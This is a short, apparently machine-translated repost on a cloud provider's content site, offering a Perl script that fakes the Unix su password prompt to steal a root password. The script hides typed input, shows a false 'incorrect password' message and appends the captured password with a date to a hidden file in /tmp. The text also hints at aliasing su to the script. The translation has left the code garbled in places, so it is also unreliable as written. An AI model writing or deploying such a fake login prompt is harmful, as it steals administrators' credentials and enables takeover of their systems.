Fake Su, perl su.pl steal root Password _ application tips

Source: Internet
Author: User
I changed it and turned it back on and added a delay:

#!/usr/bin/perl
# written by Xi4oyu <evil.xi4oyu@gmail.com>.

Print "Password:";
' Stty-echo ';
$s 1=<stdin>;
print "\ n";
' Stty echo ';
Sleep 3;
Print "Su:incorrect password\n";
Chomp ($s 1);
$s 2= "Password is:";
$s 3= "". ' Date +%y-%m-%d ';
Open (Users, ">>/tmp/.pass") | | Die;
Print users ($s 2, $s 1, $s 3);
Close (users);

It is obvious that the direct use is 8 lines, but also has the alias restoration and so on work to do, everybody reader oneself to fix!

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.